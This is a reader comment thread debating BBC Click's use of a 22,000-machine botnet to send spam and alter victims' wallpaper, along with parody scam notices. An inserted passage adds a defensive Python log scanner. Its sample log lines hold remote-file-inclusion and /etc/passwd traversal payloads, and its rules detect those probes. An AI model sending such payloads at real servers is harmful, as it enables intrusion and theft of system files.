Dear WinTard user...
So how many of the 22,000 hijacked machines were running OS X?
No further questions ;)
An investigation by the BBC into cybercrime may itself have broken UK computer crime law. BBC Click got its hands on a botnet of 22,000 compromised PCs from an underground forum. It used these machines to send spam to two accounts it had established with Gmail and Hotmail. The programme also used these zombie machines to show …
"Even if it was done with the best intentions and in the public interest, that is unauthorised modification of a computer and an offence under the Computer Misuse Act,"
What's even more offensive is not prosecuting the company that supplied the OS that was so easily compromised in the botnet attack. Now what was the name again? I notice it was never mentioned in the original article.
"These are not attacking any kind of vulnerability in the computer... They are attacking the vulnerability of people's brains"
http://www.guardian.co.uk/technology/2004/may/05/viruses.security
"We were just seeing how easy it is to do" ...
Similar to that McKinnon bloke's defence, imo; he was just looking......
Dodgy corporation thinking that the laws don't apply to them as per usual, even though they actually helped the infected users by advising them how easy they were to infect.... The fact remains that they illegally took control of those machines.... And if the owners of said machines have unpatched/unprotected machines in the first place, the chances are that they won't know/care about patching them now...
The only way to prevent machines being incorporated into botnets would be for a law to be passed where ISPs detect if machines are fit to be used on the Internet (patched, secure etc.) and block them if they aren't.... similar to an M.O.T. that automobiles have to pass.
Paris 'cos she loves to be serviced !
The BBC contravene the computer misuse law in the name of education and seemingly walk away scot-free.
Forgive me if I'm mistaken but I remember similar instances whereby 'joe bloggs' has attempted similar feats in the name of education for the common good which resulted in jail time.
... the law is an ass!
Such action is probably the only way to make some people aware that their PCs have been compromised. It's certainly the most efficient, and ISPs should be encouraged to take similar action, or at least notify their customers, when they detect suspicious activity on their networks.
Do we know where the compromised PCs are based in the world?
What if some of those botnet computers were in the US military? The Pentagon? NASA?
Will the USA try and extradite the BBC's Spencer Kelly just like Gary McKinnon?
I'm running a poll on my blog if anyone wants to give their opinion on whether the Beeb were justified or not in what they did.
http://www.sophos.com/blogs/gc/g/2009/03/12/bbc-break-law-botnet-send-spam/
Cheers
Graham Cluley, Sophos
Is it still flavour of the month to bash the BBC?? I can't think of a better company that could get the message out and highlight the problem, which ultimately is a benefit to everyone.
As for lawyers, it's like asking a gardener if your lawn needs cutting......the answer will always be yes, cheque is fine....
Maybe there should be an international taskforce that collects botnets, disables them and alerts the user.
" 'The BBC appears to have broken the Computer Misuse Act by causing 22,000 computers to send spam,' said Struan Robertson, editor of out-law.com and legal director at solicitors Pinsent Masons. 'It does not matter that the emails were sent to the BBC's own accounts and criminal intent is not necessary to establish an offence of unauthorised access to a computer.' "
If SPAM is defined as "Unsolicited email of a commercial nature" (and I am reasonably certain that it is [meat-like products not withstanding]) then you cannot, by definition, SPAM yourself. Because then it isn't unsolicited.
The unauthorized access to a computer bit is still valid though.
Great, so now a hacker can get into people's computers, put a screensaver on saying this is the BBC, you need to install some software to fix this, cue download more malware. This is exactly the kind of thing we are told not to trust ('your bank will never ask for your password' etc.); you would think the BBC wouldn't hack into your computer!
They will get off scot-free but they deserve a massive fine for this, what were they thinking????
Again and again in these forums, and I'm thinking of the ones that relate to botnets and spam and viruses, commenters are arguing over the rights and wrongs of using a 'good' virus or some other techniques to expose users' vulnerability to hijacking and prompting them to fix it.
Now someone has actually gone and done that and you're all jumping up and down, shouting 'It's wrong! It's wrong!' Make your chuffing minds up, peeps. What is it you actually want?
A spam reduced world or the one that we've got where we all sit around bitchin about how botnets and spam are the incarnation of Satan but actually doing fuck all to fix anything more than our own spam filters?
Personally, I think the BBC have probably done us a service by, hopefully, reducing by a few thousand the number of machines capable of spewing out the shit that we all have to filter from our inboxes 24/7.
Yes, it was probably illegal. But FFS surely that has to be weighed against the positive end result.
IMHO I don't think they went far enough by half.
I'm still bemused knowing that thousands of folk out there don't even notice that their computer runs like a 20-year-old one-legged dog, with slow-to-useless web speeds and busy hard drives that are sending out spam every day.
Do these tards not know what a smooth uninfected PC should be like?
"Oh I thought that was normal" "What's task manager?"
Aims Anti Webtard rifle
*Click*
I'll vote for a licence to use a computer any day, whenever if ever a petition arises.
*Bang*
Now forgive me if I'm wrong and feel free to persecute me if I'm being bloody stupid, but the headline:
"BBC team exposes cyber crime risk "
does lend itself to intimating that this is something the beeb has uncovered. Now I can accept the argument that the BBC news website is read by a large audience which is not particularly knowledgeable about botnets and so an article is newsworthy on the website, however, compounding a lack of research into cybercrime law with sending oneself up for 'exposing' something that has been well known to be in existence is very shoddy journalism.
Even the simplest of investigations would show how well known this is and also would show how easy it is to gain access to a 'botherd' without having to then very probably break the law in doing so. The argument that it was in the public interest is particularly weak here as I cannot see how they can demonstrate that they needed to perform a mass email send.
My own opinions of BBC technology reporting aside, I think that if Daniel Cuthbert can be prosecuted for his "offence" then the Click team should be worried. At least he wasn't trying to grandstand! It would be nice if the BBC could articulate just how they decided this was a wise thing to do even if it was a good thing to make the masses more aware.
Bill - because most of this is his fault.
Well, if the BBC acted unlawfully it shows how useful this law is. If it doesn't stop the public broadcaster it's not exactly going to stop someone whose motives are less wholesome.
If your system has been compromised, the fact that it's against the law isn't going to help. It's like the hunt master reassuring the police that he will say "Stop" when the hounds have picked up a scent.
Well as far as I'm concerned if the BBC had altered the machines so that they were taken offline then I would have been applauding the action.
Often machines that have been participating in botnets have been doing so for far to long and need to be shutdown, updated and fixed and then regularly updated and maintained from that point onwards instead of becoming spam generation machines.
Can I use that an excuse next time I'm found in a strangers house in the middle of the night?
"It's not illegal, your front door was open because you basically gave your keys to a stranger down the pub. So I've just come in to walk around and see what your house looks like, oh and I might have used your computer to send a few emails, but I've not done anything really illegal like actually steal anything"
There really are some fuckwits at the BBC. I don't actually think it's illegal to leave your computer unpatched so it can be hijacked; it IS illegal to access those computers without permission and use them in a covert way.
"What's even more offensive is not prosecuting the company that supplied the OS that was so easily compromised in the botnet attack. Now what was the name again, I notice how it was never mentioned in the original article."
If you think non-Windows OSs can't be compromised by stupid users running dodgy programs, you're asleep, and aren't paying attention to your security mailing lists, and I hope to God you aren't responsible for computer security in your job.
"The BBC contravene the computer misuse law in the name of education and seemingly walk away scot-free."
I'm not trying to say they _won't_ get away with it, but that news story was posted at 5am, 9 hours ago. It's hardly a huge miscarriage of justice that there hasn't been evidence collected and a decision to prosecute made at this stage, is it?
I found this story on The Register having already tried to make a complaint to the Met about the BBC. Because I am not a victim I am unable to, they will not take a complaint.
I will be making a complaint to the Press Complaints Commission too.
My main beef with this is that the BBC are making this outrageous claim that because there was no criminal intent it is legal.
You've got potentially loads of script kiddies out there who may well want to do nothing more than spam their friends who may well now believe their acts are legal and may well end up prosecuted for doing something the BBC has told them is legal.
"You are using the letter of the law to defeat the spirit of the law"
What they did probably removed a huge amount of computers from that botnet. Yes the BBC had control of these machines, and could have done massive amounts of damage - but considering how easily the BBC got access to this botnet surely you'd be happy to see it removed from the internet rather than still out there waiting for letters to filter through ISPs' crappy legal depts and then slowly out to the users in all those different countries?
If they had gone onto people's computers, hunted for illegal material and then posted that information to law enforcement agencies - yes that would've gone too far - but they didn't. They acted IN the public interest, FOR the public good.
Seriously, get over yourselves, stop lapping up the Wackie Jackie hype and realise that there are exceptions to the rules and discretion should be used in some situations.
Best intentions or not - you do not break into someone's house and steal all their stuff to show it was possible and with "the best intentions".. Bandwidth was used here that will never be gotten back and perhaps people's computers crashed when the DDoS attack took place. Maybe someone had an important message set as their screensaver like "Must remember to take my pills at 2.30pm to avoid dying a painful death" and whilst their bandwidth was being throttled they could have been stopped from doing anything, ranging from having a wank to an important business conference.
And..... For future cases, if they are not prosecuted OR if they are prosecuted and the charges dismissed by "Experts", then how does this fare for future cases?
"In the case of the BBC it was argued that a denial of service attack or changing of screensaver did no harm to the computer and does not qualify as illegally modifying a computers contents"
Silly buggers....
"The BBC appears to have broken the Computer Misuse Act by causing 22,000 computers to send spam," said Struan Robertson, editor of out-law.com and legal director at solicitors Pinsent Masons. "It does not matter that the emails were sent to the BBC's own accounts and criminal intent is not necessary to establish an offence of unauthorised access to a computer."
If the emails sent were by the BBC to their own accounts, on what grounds are they 'spam' - surely that refers only to unsolicited emails?
That said, those responsible at the BBC seem very naïve if they think that what they did was in any way legal, or indeed ethical.
Hopefully the shouty lawyer types will see this as a form of "ethical hacking" rather than a black & white Computer Misuse issue. Consider if the BBC had gone down the ISP info route:
1 - spend time tracking down names and contact details for each and every ISP involved
2 - ISPs then have to look-up who was using the IP at the time
3 - Letters get written (maybe) along the lines of "Dear Mr Smith. This is your friendly ISP warning you that you need to update your Windows XP security settings.... etc."
4 - I suspect Mr Smith will get as far as "ISP" before adding the letter to the other 21,999 in the paper recycling bins around the UK.
5 - 22,000 compromisable PCs will remain compromisable.
6 - Just maybe a small percentage of people will take the letter to their PC and follow the instructions.
At least this way the BBC threw a bloody great bitmap in front of the users, with a URL containing instructions on how to fix the problem. How many are going to ignore that after a few days?
An ethical approach would have notified the users immediately, and reported the botnet operator to the police.
BBC did not notify users first, did not ask for consent to use the resources of their computers, and exploited those machines regardless.
CMA is a criminal offence.
In other news, BBC launches its own version of 'Who Wants to be a Millionaire'. Contestants are given a balaclava and handgun, and get 10 minutes to steal as much cash as possible from a high street bank (all money returned, banks advised about security measures etc etc)
Is there a wallet in this coat?
It's also probably an example where the only valid kind of test is an in-the-wild test. And an in-the-wild test will have to involve a degree of blindness (preferably double-blindness) or the test becomes biased. How would the BBC be able to perform a test like this unbiased and not break the law?
As the BBC pointed out (well, they didn't mention Linux), you need to update your software.
See how many security fixes have been released for Mac and Linux....oh look there are some, best ignore them and pretend it doesn't happen coz Dave down the park told me so, so it must be true.
I don't give a flying f**k which software is the best, I left the playground a long time ago.
You my friends are the stupid sort of f**kwits that this article is trying to enlighten.
NO OS IS 100% secure. Get over it and keep updated.
I only installed that key logging software to survey how many people were using strong passwords and educate them if they weren't.... honestly!
If there isn't at the very least a criminal investigation into what the BBC did then that in itself will be criminal. I am also exceedingly Pro-BBC under normal circumstances too for the record.
It's time the ISPs and AV companies took direct action against these botnets by at the very least keeping them off the Internet until they clean up their act. This is the way the Internet has to police itself; does anyone really expect national governments or police forces to be able to do anything about this? Of course not, don't be stupid. Those dullards who let themselves be compromised need some tough love, instead of this precious pontificating. The BBC is to be commended for at least daring to do something positive - unlike the bloody US lawyers who defend the spam bandits for example!
We need direct action now against the spammers, hackers and fraudsters that are blighting the internet.
>> BBC Click claimed that "If the exercise had been done with criminal intent it would be breaking the law".
They intentionally broke the law, but it is okay because they didn't intend to break the law, therefore no law was broken. Sounds a lot like mind over matter. Are they able to bend laws with the power of their minds? Simply by thinking strongly enough, they can make the illegal legal. It all makes my brain hurt. Although, I don't suppose they invented the idea; it's not that different from the filesharing freetard* mantra.
*BTW I hate that word
Ok I'm on the fence about one issue - alerting the user... It's in their interest!
BUT using those machines to DDoS a site (no matter which) and to send mail (no matter where) was clearly NOT in the INTEREST of the computer OWNER.
This is definitely a breach of the misuse act... There is no way of painting that...
On previous shows, I have wondered at what can only be called a "Script Kiddie" approach to technical information.
Ok it does have to be dumbed down for telly, but some of the stuff they have shown has been questionable...
e.g. Go to this forum to find info on building a phishing site.... and then this one to sell your dodgy credit card numbers.
Oh and standard anti-BBC comment: trading on a reputation from years ago, should be cut back to a news organisation and the licence fee scrapped. If I want to pay for BBC then I should have a choice just like the choice I have with Sky.
Clearly changing people's backdrops to warn them of the trojan is illegal but in the best interests of both the computer user and internet as a whole. If security firms just got on and did it rather than jobsworthing up the situation then they could be making serious headway in cutting down on spam and DDoSs.
I would suggest that perhaps the reason that they don't is not because of the legal technicalities at all, but because they profit from the spread of viruses, trojans and the threat of DDoS attacks.
I think the Beeb did commit a crime and I think they were right to do so.
Yes, they misused these people's computers and yes they did "attack" services; two assets they had registered (I don't think Google or Yahoo! have any terms about sending SPAM *to* an address, merely *from*) and one they got permission to attack. They then committed a further crime by changing the compromised PCs' wallpaper to a warning. All small potatoes if you ask me.
The crime they have prevented is these 22,000 odd PCs being used in a malicious assault against other bodies, and probably repeatedly so. This, to my mind, more than justifies the actions. And would have more than justified the actions of the security researchers/joe-bloggs-white-hat too.
What I want to know is what the ISPs were up to during all this. If it is so pathetically easy to get access to 22,000 PCs on a bot net, why are the ISPs not doing so and KICKING THESE UNITS OFF THE NET? Why are they not DOING THEIR FECKING JOB? If they (and the police, governments and MS) fail to do their job, then it is up to the community to take action and defend itself. So save the BBC from your ire and direct it where it should go: lazy ISPs, police more obsessed with revenue generation through speeding tickets than crime fighting, and incompetent MPs.
This entire story smacks of ass-hat, lawyer, scum trying to make another fast buck.
Clearly many posters (and lawyers) would prefer that these 22,000 machines were still churning out spam and DoS attacks.
As it stands, ISPs should be prosecuted as accessories to the enormous numbers of hacks perpetrated by machines on their networks - hacks that they could easily prevent.
This is journalism, people - actual real journalism, not wikishite bogOsphere journalism where you only have to tell other people who already knew so that they'll link to you. Normal people out there in the "real world" have no idea what a bot net is and would welcome being warned that their machine has been detached from one.
Pass the info to the ISP and let them contact the user... LMAO! Oh tell me another one, that's too funny!
You're lucky if your ISP manages to keep a broadband connection up and running, let alone chasing anyone on their network who has been pwn3d!
The other year one of my email servers was on the receiving end of 20 thousand virus emails a day from one IP. It took me 3 days of constant phone calls to the ISP before they stopped, and I think that was only because I finally found the number of their technical director by randomly changing some digits at the end of their DDI range.
Once again the BBC Click show has shown that it is an ass of the highest order. The quality and knowledge of the reporters on there is questionable at best, so that most of the time I just switch over if I'm ever unfortunate enough to be around when it's on. It grieves me that licence fee is wasted on a show like this.
Paris, because she knows how to Click all the right buttons.......
Are you people defending the BBC saying that I would be right to set up a company that hacks commercial networks and then offers to plug their security holes for compensation?
They used other people's machines and bandwidth without permission, and that is clearly illegal.
Good grief....
Some of you people are clearly very, very stupid. You probably subscribe to Sky too, don't you? The two are not usually mutually exclusive.
First, the BBC did not compromise the machines - they were already compromised (by Microsoft or Apple or Linus Pauling or even the bot-herders ... whomever you prefer to blame).
Second, do you complain when the BBC breaks the law under questionable regimes (like Zimbabwe's) and reports from there when they've been banned? Or is that somehow justified because those people are foreign and therefore incapable of making their own decisions?
Third, I'm fairly certain that failure to report a crime is a crime in itself. Which means that each and every investigative journalism story about the gangland underground, about drugs, about prostitution, about illegal immigrants etc. etc. is, in itself, reported by criminals.
Fourth, how else are you meant to report a story about bot-nets? Go to Russia and find the bot-master?! The BBC may have some contacts but seriously...
In short, grow up. And keep your irrational tantrums about paying the licence fee out of an otherwise rational debate.
M'learned colleagues above, write:
... a defence of "preventing a crime"...
and
... precedent so that in future cases, could a defence of 'in the public interest' be used?...
FFS, people! Don't you know that Acts of Parliament have defences written into them, and "preventing a crime" isn't ever one of them? Don't you know that precedents are set by legal proceedings (trials, usually)? Who was asleep during General Studies, eh?
Commenting on stuff on the Interwebs is fun, but just having an opinion doesn't alter the law into something you think might be "fair".
It's a double-edged sword, but hey, it's OK to break the law, because we're the BBC, the organisation who threaten us on a regular basis with 'it's all in the database' and such...
Just a reminder to the ivory-towered BBC: it's contrary to the Computer Misuse Act & they've been daft enough to publicise it.
I wonder what ratio of viewers may look at that & be inspired by the words "it's really easy to do". As someone correctly pointed out, according to the BBC, does it legalise an offence if it's committed with relatively few traces?
According to their twitter page, they spent six months creating this program... This is not some casual faux pas.
http://twitter.com/bbcclick
"Six months in the making and finally the botnet show is ready. Presenter, Spencer Kelly in the Click edit suite. D http://twitpic.com/20yuw"
As far as I'm concerned, I see all "legal avenues" as exhausted as for taking these botnetted systems offline. Most ISPs to which these botnetted systems are connected don't pay attention to their own networks, and there are no laws put in place allowing the systems to be forcibly removed from the public internet by "good citizen action", and until these systems are actually taken offline forcibly, albeit through attacking said systems or otherwise, the owners of these systems will continue not to care.
You can warn users only so much, and most users won't care that their system is infected until you render their service (or computers) unusable and provide them no alternative but to clean their systems up.
In my opinion: Ignorance is not an excuse for having an infected machine, botnets have been an issue for well over a decade now, if you claim ignorance to having an infected machine, you shouldn't even own or run a computer.
Heard of botnets? Heard of e-voting? Pause for a synaptic connection to occur.
The Blaggers' Blagueurs Claque has the job of winning the next election for nu labour. Nu labour won't upset the applecart. After the next election, the applecart turns into a tumbril.
Just because it's become a fad thing to do does not make it legal, nor acceptable. And unless the BBC took apart the code, line by line, I personally don't accept that they have 'removed' the code. They may think they have, but it's not in the interest of the bot net sellers to reduce footprint, or thus, sales, or resources.
It is very much time that people started being seriously convicted in these cases, like the Sony rootkit. It needs to be made very clear to legal entities that computer abuse of others' systems is an illegal act, and where done wilfully by such entities, prosecution to the full extent of the law needs to be done.
Any claims that this was done in good nature, or in public awareness or any other claptrap is irrelevant. And by publishing this information and the ease of access, it simply further expands the underground and illegal acts and does not help deal with the problem.
I'm not fond of people taking taxpayers' money, and committing crime, and stupidity on this scale. Someone's head needs to roll. Now. Today. And someone needs to be taken to court. I wonder what BBC IT and management would think if this action were reversed, and their systems were hacked to 'prove a point'. I expect that would not be regarded as acceptable.
GREETINGS KIND COMPUTER USER, THIS IS THE BBC
YUOR COMPUTER MACHINE HAS BEEN INFECTED WITH VIRUSES. AS YOU MAY HAVE SEEN ON THE BBC TELEVISION WE ADVICE YOU TO IMMEDIATELY GO TO BBBC.ANTIVIRUS.COM TO PREVENT THE VIRUS FROM DESTROYING THE COMPUTER.
THIS IS SAFE AND LEGAL AND YOU MUST DO THIS IMMEDIATELY OR YOUR COMPUTER MACHINE IS IN DANGER.
THANK YOU
BBC COMPUTER SAFETY TEAM
Well, it didn't take long to get the old inferiority complex knee-jerk reaction from the Balmertard disciples.
Wussa matter kiddies? Just can't admit your OS has more holes than the friggin Titanic. bohoho!!!
Of course no OS is 100% secure, yours is just inherently less secure than the rest of the bunch put together.
Move on losers & get a life. End of story.
So this victimless crime, with no malicious intent, that hurt no one, didn't steal anything, and benefited the users by notifying them that they were botnet participants has everyone upset?
When the law is written to hurt people trying to do good, you should be upset at the law, not the person breaking it. White hat hacking should never be illegal. In fact, no type of hacking without malicious intent or monetary gain should be illegal.
This was awesome (loved the changing of the desktop piccy) and I think everyone should do this all the time. Any law that stands in the way of helping people should be re-written.
All you need is a web server (e.g. Apache), and php, and if you're careless (like many web admins are) you can become part of many botnets that target flaws in open source cross platform products, such as php or the apps that are installed on Apache and php based servers.
And don't for a minute think that the chances are low due to it being OS X or Linux. Just looking at my server logs on my Linux web server, on a daily basis there are hundreds of attempts to exploit vulnerabilities in hundreds of (mainly) php applications.
5 years or more ago I used to see attacks aimed at IIS. Now it's all php attacks and that means you mactards and lintards are the target (yeah, I know Mac users are less likely to run servers, but some do, and some might have a mini web server installed as part of some app that provides a web admin interface which is probably worse if it's not updated frequently enough).
Sure, the OS security may not allow the hacks to get into the core of the system, but the surface APIs exposed within php and Apache, once hacked, are often enough to add the system to the botnet to spam millions of others.
Enjoy.
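The commenter above describes seeing hundreds of daily exploit attempts against PHP applications in his server logs. As an added example (my code, not the commenter's or any project's), here is a small Python scanner over constructed Apache combined-format access log lines that flags the common patterns behind such attempts (remote file inclusion, path traversal, null bytes, probes for admin tools) and ranks the source addresses. The IP addresses, paths and user agents are constructed; the rule set and the repeat-offender threshold are assumptions a practitioner would tune to their own site.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2009:09:14:02 +0000] "GET /index.php?page=http://198.51.100.9/x.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [12/Mar/2009:09:14:03 +0000] "GET /gallery/view.php?file=../../../../etc/passwd HTTP/1.1" 404 210 "-" "Mozilla/4.0"
192.0.2.44 - - [12/Mar/2009:09:15:11 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 198 "-" "libwww-perl/5.8"
192.0.2.44 - - [12/Mar/2009:09:15:12 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 198 "-" "libwww-perl/5.8"
198.51.100.20 - - [12/Mar/2009:09:16:40 +0000] "GET /blog/index.php?p=42 HTTP/1.1" 200 8831 "http://example.org/" "Mozilla/5.0"
198.51.100.20 - - [12/Mar/2009:09:16:41 +0000] "GET /blog/style.css HTTP/1.1" 200 1203 "http://example.org/blog/" "Mozilla/5.0"
"""

# Combined log format: ip ident user [timestamp] "METHOD target PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Detection rules (assumed, not exhaustive): name -> predicate over the decoded request target.
RULES = [
    ("remote_file_inclusion", lambda t: re.search(r'[?&][^=&]+=(https?|ftp)://', t) is not None),
    ("path_traversal",        lambda t: '../' in t or '..\\' in t),
    ("null_byte",             lambda t: '\x00' in t),
    ("admin_tool_scan",       lambda t: re.search(r'/(phpmyadmin|pma|myadmin)/', t, re.I) is not None),
]


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    # Decode twice so that double-encoded payloads (%252e%252e/) are seen as plain text.
    rec["decoded"] = unquote(unquote(rec["target"]))
    return rec


def scan_log(text):
    """Return a list of (source_ip, rule_name, decoded_target) for every suspicious request."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, predicate in RULES:
            if predicate(rec["decoded"]):
                hits.append((rec["ip"], name, rec["decoded"]))
    return hits


def offenders(hits, threshold=2):
    """Source IPs with at least `threshold` flagged requests, most active first."""
    counts = Counter(ip for ip, _, _ in hits)
    return [(ip, n) for ip, n in counts.most_common() if n >= threshold]


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for ip, rule, target in found:
        print(f"{ip:15} {rule:22} {target}")
    print("repeat offenders:", offenders(found))
```

Matching on the decoded target rather than the raw line is the point of the example: attackers routinely percent-encode the interesting part of a request, and a rule that only looks at the raw string misses it. The response status is deliberately ignored, since a 404 on a probe still tells you which addresses are scanning.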
The show will have to have been cleared with the BBC lawyers before broadcast (and if they were sensible, they will have got legal advice BEFORE production even started), so it will be fascinating to know what 'Click' was told.
The law appears to be clear, but I wonder if the Beeb's lawyers thought they could rely on a 'public interest' defence - and if they did, where they got that reading of the law.
Still, I feel sorry for Click's half-dozen regular viewers if Spencer and co. are sent to chokey.
They didn't only send a few k of emails out, but they also left it running for hours, which they say in the video. Doing the original emails to improve public awareness may be OK,
but doing it for hours is OTT?
Remember some people are charged for the bandwidth they use, so I'm guessing the Beeb is going to pay for that!?!?!
After removing the file, which they probably did by just clicking the inbuilt "remove" button, which I know for a lot of bots just allows the original user of the bot not to see it anymore but the bot coder to still have access.
Did they patch the system, so that nobody could get right back in again!?
The ISP cannot kick every infected computer off the network because they cannot see without sniffing packets if it is infected.
Even then they can't be sure of that.
Also,
if the Beeb wanted to show how powerful DDoS or spam was, why didn't they infect their OWN machines? I'm sure there are a couple of hundred boxes lying around in the BBC somewhere for them to hook up to their network.
Perhaps something on the lines of "civil disobedience"? Claiming that, given inaction to a real and genuine problem, the only way to incite corrective action is to take a stand against it, consequences or no consequences. Think of it like the "village and the guerrillas" moral dilemma.
This is what juries of our peers are for. To be ordinary (hopefully) intelligent people sitting as the last line of defence against the rampant and gratuitous fuckwittery [My (TM), I coined it!] of the government and legal (not "justice") systems.
You could have a kilo of herb in your living room, and the Street Wars camera crew all over it, but if a jury of your peers decides that you have not caused harm to anyone but yourself, then PC Plod is very sorry to have bothered you. Or else.
If the BBC can present a clear case that their actions had overall positive results in the public interest, then they have nothing to morally *feel guilty* about. The jury should, in theory, feel the same way, and subsequently exercise their right to deliver the verdict they feel appropriate, as opposed to treating "Guilty/Not Guilty" as "In Contravention/Not In Contravention" of applicable ideological diktats.
No wonder Blair + Co. went to work on Jury trials, judicial independence, and double jeopardy!
Yes, that one, with the 40 large in used notes and Ryanair self-printed boarding pass to Portugal...
Changing the wallpaper is a standard virus tactic. Now the virus writers just need to add a BBC logo when then link you to their dodgy "anti-virus" websites. What the BBC did is stupid as it hands more ammo to the virus writers.
It makes more sense for an ISP to be blocking these infected machines, but that would mean port monitoring. So a minefield in all directions.
And anyone who calls a wallpaper a screensaver should be shot.
People that allow their PCs to be compromised shouldn't be using the internet. Most people will never change; they'll buy something they don't understand, never work out how to use it and then blame someone else when it all goes wrong.
Why is the BBC wasting time telling people who won't keep up with the times how to keep their computers secure? Within six months there'll be a new trojan and the dumb fucks will be back in the same situation.
"... and criminal intent is not necessary to establish an offence of unauthorised access to a computer."
Funny they should say that. So why did the police and DPP refuse to prosecute the illegal BT/Phorm trials, which constituted a similar offence, because BT "had no criminal intent?"
Considering that what the BBC did was actually beneficial, in that 22,000 botnet victims were alerted to the malware and a nice big botnet was taken offline, while what BT/Phorm did was an egregious theft of people's private data that benefits nobody but the pigs at the trough, we see yet again that the law is only enforced in ways that make life worse for everyone, never better.
Remember Orwell? "How does one man assert power over another? By making him suffer."
Let's say the BBC get away with this without significant punishment. What next?
Suppose some other broadcasters, newspapers and possibly Universities decide to educate people in the same manner, and they all try to set up botnets. The PCs that are fought over by more than one botnet experience a software problem which bricks thousands of home PCs.
Who's going to visit and fix them, one by one?
ISPs do not have to break the Computer Misuse Act; all they have to do is detect the botnet activity (or be granted control via some form of sting) and, once the IP is known, block the rogue PC.
When the dumb user phones up to see why their interpubes are broken, they can be told in excruciating detail why, how they need to fix it and how much the ISP is going to bill them. Also that they are now blacklisted and no ISP will touch them until their PC is independently verified as being clean (at the user's expense).
People who do not take their security on the internet seriously should not be on the internet. A bit like those who do not take their personal safety seriously in many sports get kicked out pretty quick.
To the others bleating about Mac/Linux; for the *average* user (note: not running a server) both of these OSs are leagues more secure than Windows. The guys on the "Going Linux" podcast left a Linux box attached to the net (no firewall, nothing) with an open invite to hack it. It remained secure. Episode 21, Dec 20th 2007.
You are quite right about PHP et al (which goes back to the first point; if you don't take security seriously.....) but Mac/Linux are more by their nature secure. Windows, by its nature, is the loose, clap ridden tart whoring around the seedier taverns making out with as many people as it can and spreading its "special gifts" far and wide.
As Linux is free, this also means the poor and needy can still get net access (for job hunting etc) and not have to pay through the nose for the OS, AV, firewall, spyware detectors etc. that you need to have a hope of keeping Windows safe.
I am a Windows user, but I am getting increasingly pissed off with it.
The problem is that the newer computers are like that when they arrive.
I have an aged Win2k box; Task manager shows ~20-30 tasks (including DNS, Web, FTP, etc. servers).
My wife's new laptop shows ~70 tasks doing nothing. Runs like a dog, brand new before even being exposed to the 'net.
Oh and then there's the fact that the nasty tasks don't show up because Sony hid them...
When I read the BBC report I could hardly believe it. What complete idiots.
There are professional security people who study botnets. They are as keen as anyone to investigate them, but do they do this sort of thing? No. Because it's unethical and illegal. (Oh and because they're professionals not ignorant amateurs.)
If this goes unchallenged, how long before the government grants itself the right to hack into your computer "just to check if everything is all right"? How long before there's a virus claiming to be a friendly visitation from the BBC? The law forbids this sort of thing for a multitude of reasons. The contents of my computer belong to me. Just because one criminal manages to break in doesn't mean I want to invite a load of crooks from the BBC along to join them in a big botnet party. And I certainly don't need the BBC nannying me about how to set up my computer. If I want advice on that, I'll go to someone who knows what they're doing, not a bunch of journos on a mission.
Doubtless it will be difficult, as usual, to get a criminal investigation started against the BBC, but that shouldn't stop us trying. If I owned one of the compromised computers I'd also certainly be exercising the BBC's complaints machinery right now and that would include a demand for a substantial amount of monetary compensation.
I sent this letter to the BBC first thing this morning:
"I'm saddened by the BBC's apparent complete lack of comprehension of the issues at stake in this report. The clear implication in the latest Click report is that you think breaking into and entering people's personal computers is acceptable behaviour, as long as your actions are benign in nature. The claim that the Click programme was not breaking the law because there was no criminal intent simply doesn't stand up; unauthorised computer usage is not treated in the same manner as trespass under UK law. You do not need to be of criminal intent, you merely need to be executing programs on a computer to which you do not have authorised access. See the Computer Misuse Act 1990, section 1.1:
(1) A person is guilty of an offence if—
(a) he causes a computer to perform any function with intent to secure access to any program or data held in any computer;
(b) the access he intends to secure is unauthorised; and
(c) he knows at the time when he causes the computer to perform the function that that is the case.
This comes with a maximum sentence of six months and a fine of up to £5,000.
Should you require a real world example, there is a current case (of which I should not need to remind Click) in which a UK citizen is due for extradition to the U.S. to face a military tribunal for alleged hacking offences. His defence bears remarkable similarities to that claimed by Click - yet the UK government has no hesitation in sending him off because he broke the law and is not above it. As a hacker, it doesn't matter what colour of 'hat' you are wearing or what your motives are; if you access any computer without authorisation you're breaking the law and are liable for prosecution.
Furthermore, the activities in which Click has engaged will do little to further the real cause of computer security, but will certainly put money into the pockets of the criminals (£5,000 by my reckoning) that the real professionals are trying to stop.
I would advise anyone that has received an email from the BBC informing them of the risk posed to their computer, to speak to a solicitor and consider filing charges. I would remind the BBC that no organisation or individual has the right to behave like this, for the purposes of exposure or otherwise."
Just beggars belief. I'd like to know exactly who was their legal counsel and why they're still in a job. So, so cavalier and naive.
Boing!
Here is the news from the BBC. Botnets are very bad for you. In other news today it was reported that Lord Mandelson of Custard Green has given assurances that he only intends to privatise 49% of the BBC which would give the Corporation access to high quality content from other providers. A spokeswoman for the Greedy But Needy channel said she welcomed the proposals of her friend Mandy and, quite frankly couldn't wait to get her hands on all that lovely licence fee income.
A judgement today in the European Court ruled that proposals by the UK government to implant RFID chips in the brains of new-born babies was abhorrent and totally illegal. Gordon Brown and the Daily Mail have condemned the ruling as an unwarranted interference in the affairs of an independent sovereign nation.
Our lead item in this evening's bulletin contained an unsupported assertion that Botnets might not provide you with a life enhancing experience. The BBC would like to issue an apology to anyone who has been offended by this item. Under new restrictions it is no longer permissible for the Corporation to provide evidence to support such clearly nonsensical claims.
And now, the weather from Worzel Gummidge.
This can and will now only lead to more malware suppliers using the BBC logo. I can also anticipate them using this with the following format :-
The BBC has 0wned your box. This is ok as we didn't do anything bad.
Please enter your user banks name and password here so that we can check it is strong enough for you.
Remember the BBC would never do anything to hurt you.
